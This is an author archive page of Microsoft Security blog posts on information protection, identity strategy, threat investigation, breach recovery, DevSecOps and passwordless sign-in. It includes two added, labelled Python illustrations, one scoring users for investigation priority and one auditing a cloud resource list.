Author Archives: Todd VanderArk

3 strategies for building an information protection program

Five years ago, we started on a journey to update and simplify information protection at Microsoft. We had a manual data classification process that our users didn’t use effectively and that didn’t work with our data storage or database technology. We had to find ways to re-classify data and build effective tools while protecting our most important asset: customer and employee information.

We’ve learned a lot about data protection and tools and today we’re sharing some of our best practices for:

  • Laying the groundwork for protecting information.
  • Protecting trade secrets.
  • Starting your information protection journey.

Laying the groundwork for protecting information

Identifying the location of data—The first step to creating a strategy is discovering where your data and major storage places are so you can create a data landscape. Do you have data on your endpoints? Start by looking across your organization to identify your customer data, regulatory data, and other sensitive information.

Classifying the data—Classifying data is the most important and most difficult step. At Microsoft, we used a custom three-level manual label classification process but found that no one understood how to apply the labels correctly. We worked with legal, HR, and other groups to identify labels that made sense for our company with a goal that they could be applied automatically.

Our objective is to ensure that our data and our customer data is handled properly, classified correctly, and is protected. We’re a global company and the General Data Protection Regulation (GDPR) is the baseline—and one of our key tenets—for how we think about our information and how we protect it. We replaced the manual classification labels with a more intuitive labeling taxonomy that better aligns with industry standards:

  • Non-Business: Data that is non-business related and doesn’t belong to Microsoft.
  • Public: Data designed for public consumption.
  • General: Business data not meant for public consumption.
  • Confidential: Sensitive business data that could cause business harm if over-shared.
  • Highly Confidential: Very sensitive business data that would certainly cause the business harm if over-shared.

Identifying and resolving old data—Before you roll out new tools, there may be old data that you need to review and resolve. For example, you may need to clean up, delete, or protect your data. When reviewing data, consider the age of the data and if anyone is still using a document. Prioritize and create rules for saving, deleting, and protecting data.

Protecting the data—You want to protect the data based on classification. Protecting customer and personal information is at the core of what we’re trying to protect at Microsoft. For smaller companies—or companies just starting to develop an information protection program—your biggest return will be finding customer data so you can protect it. Building customer trust and protecting customer information is key to an information protection program.

Protecting trade secrets

Protecting our identities is an extremely important part of the information protection journey. But what if you come across a document with trade secret information? You should probably work with the group that handles trade secrets at your company. We have a white glove program with HR where we build specific programs for specific business units. Using products like Key Vault can help protect sensitive data.

Starting your information protection journey

If you’re just starting to build an information protection program, we recommend the following three-step process:

  1. Governance, risk, and compliance—Have your legal and HR teams help you define the types of information you need to defend. Always focus on customer data and sensitive information.
  2. Education and awareness—Labels are always important because they’re the foundation for identifying the difference between confidential and general business data. Use terminology that’s easy for users to understand. Train them and use tools to implement your solutions. We used education campaigns and we also built tool tips and Rights Management Service (RMS) templates into our products. For example, if I’m working in an Office experience, I might get a tool tip prompting me to classify a document as confidential. We found that 50 percent of the time, users will increase the confidentiality of the document.
  3. Tools rollout—When you’re working with tools, remember that you’re typically interacting with customer and employee information. It’s an opportunity to build trust as a company. Some of the information protection tools we use include Office 365 Information Protection and Azure Information Protection, which provide labeling functionality we can push to endpoints, as well as labels and tool tips for Office documents. We also use the file share scanner and Windows Information Protection (which is still in pilot phase).

Building an information protection program is not one-size-fits-all, but if you choose classification terms that are easy to understand and implement, proactively educate users, and bake information protection into existing processes to minimize impact, you can increase the success of the program.

For more information about how Microsoft has implemented these strategies, watch the IT Showcase webinar, Speaking of security: Information protection.

The post 3 strategies for building an information protection program appeared first on Microsoft Security.

5 principles driving a customer-obsessed identity strategy at Microsoft

The cloud era has fundamentally changed the way businesses must think about security. For a long time, we built security around the perimeter. But today, the boundaryless landscape demands that we start with the individual.

In our journey with customers co-designing our products and services, Microsoft has learned that our identity solutions need to do more than just support employee productivity. We have to take things further to ensure our solutions empower our customers to work more closely with their business partners and nurture deeper relationships with their customers, who want help not just securing their personal information, but also protecting their privacy. The problems our customers need to solve, and the scenarios they want enabled for the future, have shaped the design principles guiding our identity strategy.

Embrace open standards

The world of cloud and devices is inherently heterogeneous. Our customers, their partners, and their customers will use many devices, apps, and services from many different vendors. The complexity of managing and securing such a mixed environment could be overwhelming if not for open standards. For example, OAuth 2.0, OIDC, and SAML enable single sign-on across apps and clouds from multiple vendors, SCIM enables automated user provisioning, and the new standards from the FIDO Alliance make signing in more secure. This is why every API and protocol Azure AD supports is based on open standards and why Microsoft is actively engaged in all the major identity standards bodies.

Offer industry-leading security

Our goal is to create an identity system that’s secure and private from the ground up. This means blocking every avenue of attack that we can. Enabling MFA reduces credential-based security breaches by more than 99 percent, but there’s still risk from people mishandling their passwords or getting tricked into handing them over. Adopting FIDO with the recently ratified WebAuthn standard makes it possible to eliminate passwords altogether, replacing them with a biometric device or a phone. If you have a Microsoft Account, you can go passwordless today. Soon, passwordless sign-in will be an option on every Microsoft platform and application, as well as for third-party applications that integrate with Azure AD.

We now put the full power of the cloud behind every authentication request. Using Azure AD Conditional Access as a starting point, organizations can implement a Zero Trust security strategy that examines not only the identity of the user, but also the type and health of their device, the properties and reputation of the network they’re connecting from, the app they’re using, and the sensitivity of the data they’re trying to access. This not only makes security stronger, it also improves the user experience. For example, we can employ cloud-scale machine learning algorithms, which process trillions of signals daily, to learn each user’s common behavioral patterns and flag authentication attempts that are abnormal or high risk. This way, policies invoke MFA or other additional measures only when necessary, making the experience less interruptive to users.

Make governance easier and more automatic

Implementing strong governance strengthens security guardrails, but most customers find the task daunting. Granting access is easy. Remembering months later to remove access for each person who may have changed roles is not. Identity systems should make it easier to assign the right access to the right people, for example, by automating user access provisioning and deprovisioning based on a user’s role, location, and business unit. It should be easier for employees and partners to request access when they need it. And most importantly, the system should prompt administrators to review access permissions on a regular cadence or when people change roles. All of these processes should be driven and informed by world-class machine learning and AI, which constantly monitor for unusual patterns and unrecognized risks.

Deliver a comprehensive solution, not building blocks

One of the key things we’ve learned from our enterprise customers is that they’re sick and tired of cobbling together identity solutions based on mix-and-match sets of identity building blocks acquired from a myriad of vendors. They want a holistic solution that supports all their applications and all their different identities while giving them security and control without the gaps that inevitably occur when multiple point solutions are patched together. We’ll do this by delivering a completely integrated identity and access management suite that gives them a single place to go to manage—and protect—all identities, whether they belong to employees, business partners, or customers, and all of the resources they need to access.

Give people control over their information

A holistic solution that accepts identities people bring with them is a necessary prerequisite to the vision of decentralized identity. Microsoft believes everyone has the right to own and control their digital identity—one that securely and privately stores all personal data. To achieve this vision, we need to augment existing cloud identity systems with one that individuals, organizations, and devices can own so they can control their digital identity and data. We believe a standards-based decentralized identity system can unlock a new set of experiences that empowers users and organizations to have greater control over their data—and deliver a higher degree of trust and security.

Taking the next step

Everyone in the identity division at Microsoft is passionately committed to ensuring the systems we build empower people to do their best work and live their best lives.

If one thing is clear, though, these identity initiatives are a journey. Over the coming months, we’ll invite you to participate in a series of technology previews, where your feedback will help shape how identity services will take us closer to a world without passwords, where organizations can easily manage and secure complex environments, and individuals can worry less and stop making trade-offs among ease of use, privacy, and security. Working together as an industry, we’re building a better path to security and privacy, anchored around the one constant in this fast-moving, heterogeneous world—you.


The evolution of Microsoft Threat Protection, June update

Since our announcement of Microsoft Threat Protection at Microsoft Ignite, our goal has been to execute and deliver on our promise of helping organizations protect themselves from today’s sophisticated and complex threat landscape. As we close out our fiscal year, we’ve continued progress on developing Microsoft Threat Protection, launching new capabilities and services. Hopefully, you’ve had a chance to follow our monthly updates.

As we previously shared, Microsoft Threat Protection enables your organization to:

This month, we want to share new capabilities that are starting public previews.

Efficient remediation and response for identity threats

Presently, efficient and effective response to identity threats is crucial, and Microsoft Threat Protection is built on the industry’s most widely used and comprehensive identity security service. As more organizations adopt hybrid environments, data is spread across multiple applications, is on-premises and in the cloud, and is accessed by multiple devices (often personal devices) and users. Most organizations no longer have a defined network perimeter, making traditional security tools obsolete. Identity is the control plane that is consistent across all elements of the modern organization.

At RSA, we announced a new unified Identity Threat Investigation experience between Azure Active Directory (Azure AD) Identity Protection, Azure Advanced Threat Protection (ATP), and Microsoft Cloud App Security. This experience will go into public preview this month.

Part of the new experience is enabled through Azure AD’s new integration with Azure ATP. Also, integration between Azure AD and Microsoft Cloud App Security enables continuous monitoring of user behavior from sign-in through the entire session. Microsoft Threat Protection’s identity services leverage user behavior analytics to create a dynamic investigation priority score (Figure 1) based on signals from Azure AD, Microsoft Cloud App Security, and Azure ATP. The investigation priority is calculated by assessing security alerts, abnormal activities, and potential business and asset impact related to each user. This score can help Security Operations (SecOps) teams focus on and respond to the top user threats in the organization.

Figure 1. The investigation priority view.

To learn more, read Investigating identity threats in hybrid cloud environments.

Game-changing capabilities for endpoint security

Every month, Microsoft Threat Protection detects over 5 billion endpoint threats through its Microsoft Defender ATP service. Customers have long asked us to extend our industry-leading endpoint security beyond the Windows OS. This was a major driving force for us to deliver endpoint security natively for macOS in limited preview earlier this year. We’re excited to announce that Microsoft Defender ATP for macOS is in public preview.

Microsoft Threat Protection customers who have turned on the Microsoft Defender ATP preview features can access Microsoft Defender ATP for Mac via the onboarding section in the Microsoft Defender Security Center. For more information and resources, including system requirements, prerequisites, and a list of improvements and new features, check out the Microsoft Defender ATP for Mac documentation.

To further enhance your endpoint security, “live response,” our new incident response action for SecOps teams, is currently in public preview. Today, your employees often work beyond the corporate network boundary, whether from home or while traveling. The risk for compromise is potentially higher when a user is remote. Imagine the executive who connects their laptop to hotel Wi-Fi and is compromised. With current endpoint security services, SecOps would need to wait until the executive got back to the office, leaving a high-value laptop exposed. With our new live response, SecOps teams gain instant access to a compromised machine regardless of location, as well as the ability to gather any required forensic information.

This powerful feature allows you to:

  • Gather a snapshot of connections, drivers, scheduled tasks, and services, as well as search for specific files or request file analysis to reach a verdict (clean, malicious, or suspicious).
  • Download malware files for reverse-engineering.
  • Create a tenant-level library of forensic tools like PowerShell scripts and third-party binaries that allows SecOps to gather forensic information like the MFT, firewall logs, event logs, process memory dumps, and more.
  • Run remediation activities such as quarantine file, stop process, remove registry, remove scheduled task, and more.

To learn more, try the live response DIY or read Investigate entities on machines using live response.

Figure 2. Run remediation commands.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit the Microsoft Threat Protection webpage. Organizations like Telit have already transitioned to Microsoft Threat Protection, and our partners are also leveraging its powerful capabilities.

Begin a trial of Microsoft Threat Protection services, which also includes our newly launched SIEM, Azure Sentinel, to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.


Investigating identity threats in hybrid cloud environments

As the modern workplace transforms, the identity attack surface area is growing exponentially, across on-premises and cloud, spanning a multitude of endpoints and applications. Security Operations (SecOps) teams are challenged to monitor user activities, suspicious or otherwise, across all dimensions of the identity attack surface, using multiple security solutions that often are not connected. Because identity protection is paramount for the modern workplace, investigating identity threats requires a single experience to monitor all user activities and hunt for suspicious behaviors in order to triage users quickly.

Today, Microsoft is announcing the new identity threat investigation experience, which correlates identity alerts and activities from Azure Advanced Threat Protection (Azure ATP), Azure Active Directory (Azure AD) Identity Protection, and Microsoft Cloud App Security into a single investigation experience for security analysts and hunters alike.

Modern identity attacks leverage hybrid cloud environments as a single attack surface

The identity threat investigation experience combines user identity signals from your on-premises and cloud services to close the gap between disparate signals in your environment and leverages state-of-the-art User and Entity Behavior Analytics (UEBA) capabilities to provide a risk score and rich contextual information for each user. It empowers security analysts to prioritize their investigations and reduce investigation times, ending the need to toggle between identity security solutions. This gives your SecOps teams more time and the right information to make better decisions and actively remediate identity threats and risks.

Azure ATP provides on-premises detections and activities with abnormal behavior analytics to assist in investigating the most at-risk users. Microsoft Cloud App Security detects and alerts security analysts to the potential of sensitive data exfiltration for first- and third-party cloud apps. And Azure AD Identity Protection detects unusual sign-in activity, applying conditional access to the compromised user until the issue is resolved. Combined, these services analyze the activities and alerts, using UEBA, to determine risky behaviors and provide you with an investigation priority score to streamline incident response for compromised identities.

To further simplify your SecOps workflows, we embedded the new experience into the Cloud App Security portal, regardless of whether you’re using Microsoft Cloud App Security today. While it enriches each alert with additional information, it also allows you to easily pivot from the correlated alert timeline directly into a deeper dive investigation and hunting experience.

User investigation priority

We’re adding a new dimension to the current investigation model, which is based on the total number of alerts: a user investigation priority, determined by all user activities and alerts that could indicate an active advanced attack or insider threat.

To calculate the user investigation priority, each abnormal event is scored based on the user’s profile history, their peers, and the organization. Additionally, the potential business and asset impact of any given user is analyzed to determine the investigation priority score.
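As an added illustration (not Microsoft’s scoring algorithm, which the post does not publish), the following Python models a user investigation priority the way the text describes: each abnormal activity is scored against the user’s own history, their peer group, and the whole organization; open alerts add severity points; and the total is weighted by the user’s business and asset impact. The organization, daily activity counts, impact weights, and alert point values are all constructed for the example.

```python
"""Illustrative user investigation priority score (constructed model).

Assumed scoring model for demonstration, not Microsoft's UEBA algorithm.
Each abnormal activity is scored against three baselines (the user's own
history, the user's peer group, the whole organization); only upward
deviations count; open alerts add points by severity; and the total is
weighted by the user's business/asset impact.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from statistics import mean, pstdev

# Points per open alert by severity (1 = low, 2 = medium, 3 = high). Assumed values.
ALERT_POINTS = {1: 5, 2: 10, 3: 20}
MAX_Z = 10.0        # saturate each deviation so one wild outlier cannot dominate
MIN_STDDEV = 1.0    # floor for flat baselines (no divide-by-zero, no hair-trigger scores)


@dataclass
class UserProfile:
    name: str
    peer_group: str
    impact_weight: float                 # 1.0 = ordinary user, >1 = privileged / high-value
    history: dict[str, list[float]]      # activity type -> daily counts over past days
    today: dict[str, float]              # activity type -> count observed today
    alert_severities: list[int] = field(default_factory=list)   # open alerts on this user


def positive_zscore(value: float, baseline: list[float]) -> float:
    """Standard deviations that `value` sits above `baseline`, clamped to [0, MAX_Z]."""
    if not baseline:
        return 0.0
    sd = max(pstdev(baseline), MIN_STDDEV)
    z = (value - mean(baseline)) / sd
    return min(max(z, 0.0), MAX_Z)


def activity_score(user: UserProfile, org: list[UserProfile], activity: str) -> float:
    """Score one activity type against own, peer-group and organization baselines."""
    value = user.today.get(activity, 0.0)
    own = user.history.get(activity, [])
    peers = [c for u in org if u is not user and u.peer_group == user.peer_group
             for c in u.history.get(activity, [])]
    everyone = [c for u in org for c in u.history.get(activity, [])]
    return sum(positive_zscore(value, b) for b in (own, peers, everyone))


def investigation_priority(user: UserProfile, org: list[UserProfile]) -> float:
    """Impact-weighted sum of abnormal-activity scores and open-alert points."""
    activities = set(user.history) | set(user.today)
    behaviour = sum(activity_score(user, org, a) for a in activities)
    alerts = sum(ALERT_POINTS.get(sev, 0) for sev in user.alert_severities)
    return user.impact_weight * (behaviour + alerts)


def percentile_rank(user: UserProfile, org: list[UserProfile]) -> float:
    """Fraction of users in the org whose priority is at or below this user's."""
    scores = {u.name: investigation_priority(u, org) for u in org}
    mine = scores[user.name]
    return sum(1 for s in scores.values() if s <= mine) / len(scores)


def ranked_users(org: list[UserProfile]) -> list[tuple[str, float, float]]:
    """Org members sorted by priority, highest first: (name, score, percentile)."""
    rows = [(u.name, investigation_priority(u, org), percentile_rank(u, org)) for u in org]
    return sorted(rows, key=lambda r: r[1], reverse=True)


# Constructed sample organization: four users, two peer groups, four days of history.
FLAT = [0.0, 0.0, 0.0, 0.0]
ORG = [
    # Finance user with elevated impact, a download spike, new failed logins, one high alert.
    UserProfile("alice", "finance", 2.0,
                {"files_downloaded": [6, 10, 6, 10], "failed_logins": FLAT},
                {"files_downloaded": 26, "failed_logins": 5}, alert_severities=[3]),
    UserProfile("bob", "finance", 1.0,
                {"files_downloaded": [14, 18, 14, 18], "failed_logins": FLAT},
                {"files_downloaded": 16, "failed_logins": 0}),
    UserProfile("carol", "engineering", 1.0,
                {"files_downloaded": [14, 18, 14, 18], "failed_logins": FLAT},
                {"files_downloaded": 18, "failed_logins": 0}),
    UserProfile("dan", "engineering", 1.0,
                {"files_downloaded": [14, 18, 14, 18], "failed_logins": FLAT},
                {"files_downloaded": 14, "failed_logins": 1}, alert_severities=[1]),
]

if __name__ == "__main__":
    for name, score, pct in ranked_users(ORG):
        print(f"{name:<6} priority={score:6.1f}  at-or-above {pct:.0%} of users")
```

Alice tops the list because her spike stands out against all three baselines and is doubled by her impact weight, while Dan ranks second on a single low alert plus failed logins, which is the ordering a SecOps triage queue would want.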

The new concept is included on the updated user page, which provides relevant information about who the user is, the investigation priority score, how it compares across all users within the organization, and abnormal alerts and activities of the user.

In the image below, the user’s investigation priority score of 155 puts them in the top percentile within the organization, making them a top user for a security analyst to investigate.

Identity threat investigation user page.

The score is surfaced on the main dashboard to help you get an immediate idea of which users currently represent the highest risk within your organization and should be prioritized for further investigation.

Top users by investigation priority on the main dashboard.

Improved investigation and hunting experience

Beyond signal correlation and a redesigned user page, the new identity threat investigation experience also adds new and advanced investigation capabilities specifically for Azure ATP customers, regardless of whether you choose to use Azure AD Identity Protection and/or Microsoft Cloud App Security.

These capabilities include the:

  • Ability for security analysts to perform threat hunting with greater context over both cloud and on-premises resources by leveraging advanced filtering capabilities and enriched alert information.
  • Visibility and management of Azure AD user risk levels with the ability to confirm compromised user status, which changes the Azure AD user risk level to High.
  • Creation of activity policies to determine governance actions and leverage built-in automation capabilities via the native integration with Microsoft Flow to more easily triage alerts.

New threat hunting experience to analyze alerts and activities.

Get started with the public preview today

If you’re one of the many enterprise customers already using Azure ATP, Microsoft Cloud App Security, and/or Azure AD Identity Protection and want to test the new identity threat investigation experience, get started by checking out our comprehensive technical documentation.

If you’re just starting your journey, begin a trial of Microsoft Threat Protection to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

We would love your feedback! Find us on the Azure ATP Tech Community and send us your questions or feedback on the new experience.


How to recover from a security breach

Experts estimate that ransomware attacks are up over 600 percent. For most companies, the issue isn’t if a cyberattack is going to happen, but when. Some security experts advise that the best way to recover from a security breach is to plan for it before it happens.

Today we take you through:

  • Strategies for building a plan for a cybersecurity attack.
  • Four tips for sharing information with your customers.
  • How to mitigate or prevent cyber incidents.

Strategies for building a plan for a cybersecurity attack

It’s natural to focus on technology and systems during a cyberattack, but it’s just as important to understand how your business is going to respond to the event—internally, to your customers, and to the general public. How do you escalate information and to whom? You often need to integrate input from communications, operations, IT, finance, and other departments. That’s why creating a plan is so important. You want to make sure you can respond quickly and have the right outcomes for your business priorities.

You also need to identify the impact on your systems. Understanding the technology impact during a breach often involves coming up with an internal security operations center (SOC) process flow, decision trees, and a communications escalation process that identifies when you get information, who is told about it, when they are told, and what they need to do about it. We often place information into different categories, which gives us the opportunity to identify the information and gives the business the chance to think things through and build the plan before there’s an actual incident.

Four tips for sharing information with your customers

Companies that contain a security breach in less than 30 days can save millions of dollars. That’s an incentive. But the impact of a breach is more than just financial—it impacts your reputation.

Here are four tips for responding to customers in an efficient, thoughtful way that can mitigate the damage of the attack:

  1. Deliver the right message to your customers after a breach—quickly. Companies used to have the luxury to wait and let the investigation play out before updating the public. Now there is the expectation that if a company has information, it’s doing a disservice to its customers by withholding it.
  2. Be simple and clear. This is where working with your communications team is essential. Practice your communications and response plan before it happens to learn how to improve.
  3. Be cautious. Being transparent and clear doesn’t mean that you have to say absolutely everything about the investigation. In technology, investigations can lead to additional discoveries. Make it clear that the investigation is ongoing and provide updates as the story unfolds. Don’t say anything that you wouldn’t stake your job on, because you might have to.
  4. Divulge any information that could benefit customers who have been affected by the breach and think beyond your business. In 2018, Under Armour reported that their fitness and nutrition app, MyFitnessPal, was hacked. Email addresses and hashed passwords were stolen—affecting 150 million users. Under Armour advised customers to change the password for their app and anywhere it was used. That action demonstrated to customers that the company thought about the impact of the breach beyond their product.

Increasingly, companies are expected to think about their customers beyond their specific relationship and consider how a data compromise impacts a customer’s relationship with other companies and accounts.

How to mitigate or prevent cyber incidents

The modern threat landscape is growing in sophistication and volume. As everything is becoming more digitized, there are more ways for bad actors to harm your company.

Here are some best practices that you can use to monitor your environment and combat threats:

Visibility is a key component to effective cybersecurity and monitoring. This includes having a good SOC and visibility into mobile users, remote workers, and business partners. The more you know about what’s happening on your network, including the cloud, the more effectively you can safeguard your environment.

Cyber hygiene and up-to-date security tools are necessities for businesses of all sizes.

  • Even if you’re a small or mid-size company, you can still have good security practices. You can have controls in place, outsource to a company, or work with your provider to get insight into your network. Microsoft Azure automatically gives you access to see what’s happening in your part of the cloud. Azure Security Center enables everybody to see what’s happening in a hybrid cloud environment. You don’t have to have a big cyber defense center to build good security practices.
  • Security solutions, such as Microsoft Threat Protection, provide multiple layers of threat protection across data, applications, devices, and identities and can help protect your company from advanced cyber threats. The security services in Microsoft Threat Protection, enriched by 6.5 trillion daily signals from the Microsoft Intelligent Security Graph, work together to mitigate today’s threats.

Get started

For more detail on actionable tips from security experts on how to recover after a data breach, watch the video, How to recover from a security breach.


Ensuring security of your Microsoft Teams apps with Microsoft Cloud App Security

Apps in Microsoft Teams allow you to leverage additional capabilities, enhance your experience, and make Teams work for you by adding your favorite Microsoft and third-party services.

Today, hundreds of ecosystem apps provide a great way to enhance and customize Teams, but to enable applications and services in an organization, they often need to be reviewed across a wide range of security and compliance criteria.

At Microsoft Build 2019, we announced the app certification program, which streamlines the process of gathering app information related to security, data handling, and compliance practices from our partners, is powered by Microsoft’s Cloud Access Security Broker, and gives customers the ability to review this information in one central location.

App certification program

The goal of the app certification program is to provide customers with a reliable, unified, and publicly accessible cloud app risk assessment catalog via Microsoft AppSource and within the relevant admin portals. At the same time, we give partners the ability to work directly with Microsoft to provide the most up-to-date information about their apps’ security and compliance and certify these apps for business readiness.

In the first stage of this program, we’ll work closely with solution providers of Teams apps to ensure that the information is up to date, and allow them to self-attest their apps against more than 80 risk factors provided by Microsoft Cloud App Security, as well as leverage their security and compliance information submitted in CSA STAR.

In the future, we’ll expand this program beyond Teams to include our entire app ecosystem across Microsoft 365. We’ll also look into opportunities that would allow customers to easily identify apps that can enhance their experience in Teams, while meeting certain security and compliance requirements. A central app certification program could provide developers the ability to receive a “business ready” badge for each app and simplify the selection process for organizations.

Public risk assessment information for Teams apps.

Microsoft Cloud App Security

Microsoft Cloud App Security is a multimode Cloud Access Security Broker (CASB). It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your cloud services.

The Microsoft Cloud App Security cloud app catalog is the basis for the new certification program. Today, it includes an extensive and continuously growing catalog of more than 16,000 cloud apps that have each been assessed against more than 80 risk factors spanning security, compliance, and legal frameworks.

Risk assessment information for apps inside of Microsoft Cloud App Security.

Today, the cloud app catalog is kept updated through automated advanced data extraction, continuous analysis by the Microsoft Cloud App Security analyst team, and customer-based revision requests. Going forward, we’ll automatically update the information based on our partners’ self-attestation as they engage in the new app certification program.

The new app certification program gives our customers a transparent way to review apps and confirm they meet internal security and compliance guidelines before approving them for use in their tenant.

This program is currently in its pilot phase. To assess and manage the risk of using Teams apps, check out the security and compliance content now available via Microsoft Docs.

Selection of the partners currently covered under the app certification program.

The post Ensuring security of your Microsoft Teams apps with Microsoft Cloud App Security appeared first on Microsoft Security.

4 best practices to help you integrate security into DevOps

Microsoft’s transition of its corporate resources to the cloud required us to rethink how we integrate security into the agile development environment. In the old process, we often worked on 6- to 12-month development cycles for internal products. The security operations team was separate from the application development team and was responsible for ensuring that applications met security requirements. There was time to troubleshoot security between the two teams. Once we shifted to a shorter development cycle, we had to compress that process and bake security into DevOps.

Our experience has led us to adopt four best practices that guide our thinking about integrating security with DevOps:

  1. Inventory your cloud resources.
  2. Establish a governance structure for cloud services.
  3. Give DevOps accountability for security.
  4. Redefine centralized security.

This post walks you through these tenets with some advice we hope you can apply to your own organization.

Inventory your cloud resources

Cloud subscriptions are so easy to spin up that many organizations don’t have a comprehensive understanding of which teams are using which services. This makes it challenging to manage your costs and enforce security policies. If you are uncertain which services you are currently paying for, billing is a good place to start.

Establish a governance structure for cloud services

Once you understand your cloud inventory, you can begin the work of making sure your investments align with your business strategies. This may mean limiting which services your organization uses to maximize the ones that will help you meet your business goals. Then, align your organization to your cloud strategy by defining a governing structure:

  • Develop business scenarios that define acceptable use and configuration of cloud resources.
  • Define architecture and patterns for the cloud services you plan to use.
  • Limit who can create new subscriptions.
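As an added illustration (mine, not code from the original post), the check below audits a constructed resource export in the shape of `az resource list --output json` against two of the governance rules above: every resource must carry the mandatory owner and env tags, and only approved service types may be used. The subscription IDs, resource names, tag policy and allowed-type list are all assumed for the example.

```python
"""Audit an exported cloud resource list against a simple governance baseline."""
import json
from collections import Counter

# Constructed export in the shape of `az resource list --output json` (id/type/tags
# fields). These are made-up resources and subscriptions, not a real tenant.
EXPORT = json.dumps([
    {"id": "/subscriptions/1111-aaaa/resourceGroups/web-prod/providers/Microsoft.Web/sites/shop-web",
     "name": "shop-web", "type": "Microsoft.Web/sites", "location": "westus2",
     "tags": {"owner": "web-team@example.com", "env": "prod"}},
    {"id": "/subscriptions/1111-aaaa/resourceGroups/web-prod/providers/Microsoft.Sql/servers/shop-db",
     "name": "shop-db", "type": "Microsoft.Sql/servers", "location": "westus2",
     "tags": {"env": "prod"}},
    {"id": "/subscriptions/2222-bbbb/resourceGroups/sandbox/providers/Microsoft.Compute/virtualMachines/vm-test",
     "name": "vm-test", "type": "Microsoft.Compute/virtualMachines", "location": "eastus",
     "tags": None},
    {"id": "/subscriptions/2222-bbbb/resourceGroups/sandbox/providers/Microsoft.HDInsight/clusters/adhoc",
     "name": "adhoc", "type": "Microsoft.HDInsight/clusters", "location": "eastus",
     "tags": {"owner": "data-team@example.com"}},
])

# Governance baseline assumed for the example: approved services and mandatory tags.
ALLOWED_TYPES = {"Microsoft.Web/sites", "Microsoft.Sql/servers", "Microsoft.Compute/virtualMachines"}
REQUIRED_TAGS = {"owner", "env"}


def subscription_of(resource_id):
    """Extract the subscription id from an ARM-style resource id."""
    parts = resource_id.strip("/").split("/")
    if len(parts) > 1 and parts[0].lower() == "subscriptions":
        return parts[1]
    return None


def audit(export_json, allowed_types, required_tags):
    """Count resources per subscription and list tag and service-type violations."""
    resources = json.loads(export_json)
    per_subscription = Counter()
    missing_tags, disallowed = [], []
    for r in resources:
        per_subscription[subscription_of(r["id"])] += 1
        tags = r.get("tags") or {}          # "tags" may be null in the export
        absent = sorted(required_tags - set(tags))
        if absent:
            missing_tags.append((r["name"], absent))
        if r["type"] not in allowed_types:
            disallowed.append((r["name"], r["type"]))
    return {
        "per_subscription": dict(per_subscription),
        "missing_tags": missing_tags,
        "disallowed": disallowed,
    }


if __name__ == "__main__":
    report = audit(EXPORT, ALLOWED_TYPES, REQUIRED_TAGS)
    print("resources per subscription:", report["per_subscription"])
    print("missing required tags:", report["missing_tags"])
    print("service types outside the approved list:", report["disallowed"])
```

An untagged resource has no accountable team, and an unapproved service type is the first sign that a subscription has drifted from the architecture and patterns you defined; both lists are what a central team would hand back to the owning DevOps team.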

Give DevOps accountability for security

The only way to effectively enforce security policies in a short development cycle is to integrate security into the application development process. Early in our evolution, we dropped security team members into application development teams to create a single team with shared goals. This revealed cultural challenges and unexamined assumptions. Initially, both the application developers and the security team expected to conduct their jobs as they had in the past. Application developers wrote code and then security operations queued up issues to address. This proved unworkable for two reasons. Security analysts were queuing up more security tasks than could fit within the cycle, and the application developers were often confused because security operations underestimated how well they already understood the nuances of security.

The only way to meet our goals was to shift accountability for security to the DevOps teams. We wanted application developers to try to solve security issues as part of their process. This required education, but we also implemented some practices that encouraged the team to take on that responsibility:

  • Secure DevOps Kit for Azure—The Secure DevOps Kit for Azure provides scripts that can be configured for each resource. During development and before production, DevOps can easily validate that security controls are at the right level.
  • Security scorecard—The scorecard highlights which members of the team are skilled at addressing security and encourages people to improve and collaborate with each other.
  • Penetration testing—When a red team conducts a penetration test of an application, the results typically inspire the team to take security more seriously.

Redefine centralized security

We experimented with eliminating a central security team entirely, but ultimately, we realized that we needed a centralized team to monitor the big picture and set baselines. They establish our risk tolerance and measure security controls across subscriptions. They also automate as many of the security controls as they can, which includes configuring the Secure DevOps Kit for Azure. This team also needed training to better understand the vulnerabilities of the cloud. Tabletop exercises to talk through possible attacks with red teams were one way they got up to speed.

As our evolving process suggests, our biggest challenge was shifting culture and mindset. We recommend that you take time to define roles and start with a small team. You can expect to continuously discover better ways to improve teamwork and the security of your process and your applications.

Get started

For more details on how we evolved our security process for the cloud, watch the Speaking of security: Cloud migration webinar and get the Secure DevOps Kit for Azure.


Advancing Windows 10 as a passwordless platform

Passwords can be frustrating, difficult to remember, and easily hacked or stolen. That’s why our vision for Windows is one of a passwordless platform—a world where users don’t have to deal with the pains of a password.

With the release of Windows 10, version 1903, we’re bringing Windows 10 closer to delivering our passwordless user and security promises, with new features that we’re excited for you to try out:

  • Adding a passwordless phone number Microsoft account to Windows.
  • Passwordless sign-in to Windows for the first time with the Microsoft Authenticator app.
  • Windows Hello certified as a FIDO2 authenticator for passwordless sign-in on the web.
  • Streamlined Windows Hello PIN recovery above the lock screen.

Figure 1. Passwordless Windows Hello sign-in to Windows 10.

Adding a passwordless phone number Microsoft account to Windows

A passwordless phone number Microsoft account is exactly what it sounds like—a Microsoft account that can be created with just your phone number in mobile Office apps like Word, OneNote, or Outlook on your iOS or Android device. It unlocks all the benefits of a Microsoft account, and most importantly, it doesn’t require a password.

Figure 2. Creating a passwordless phone number Microsoft account for Word Mobile on an iOS device.

Now for the first time ever, you can go to Settings and add a passwordless phone number Microsoft account to your device and use the Microsoft Authenticator app, or an SMS code roundtrip, to sign in for the first time—no password needed! This is enabled with an added web sign-in capability on the Windows lock screen. After that, Windows Hello is set up for an end-to-end passwordless experience.

Figure 3. Adding a Microsoft account to Windows through the Settings app.

Passwordless sign-in to Windows for the first time with the Microsoft Authenticator app

In addition to supporting passwordless phone number Microsoft account sign-in, the web sign-in capability can be used with any Microsoft account—even if it’s just a regular email account. You can try it out by adding a Microsoft account to Windows, signing in for the first time with the Microsoft Authenticator app (make sure it’s already set up for your Microsoft account), and setting up Windows Hello face, fingerprint, or PIN for later sign-ins—all without a password!

Figure 4. First time Microsoft account sign-in to Windows with the Microsoft Authenticator app.

Windows Hello certified as a FIDO2 authenticator for passwordless sign-in on the web

In November 2018, we announced the ability to use Windows Hello and FIDO2 compliant Microsoft-compatible security keys for passwordless sign-in on the web with a Microsoft account. Additionally, the FIDO Alliance recently announced that with Windows 10, version 1903, Windows Hello is a FIDO2 certified authenticator.

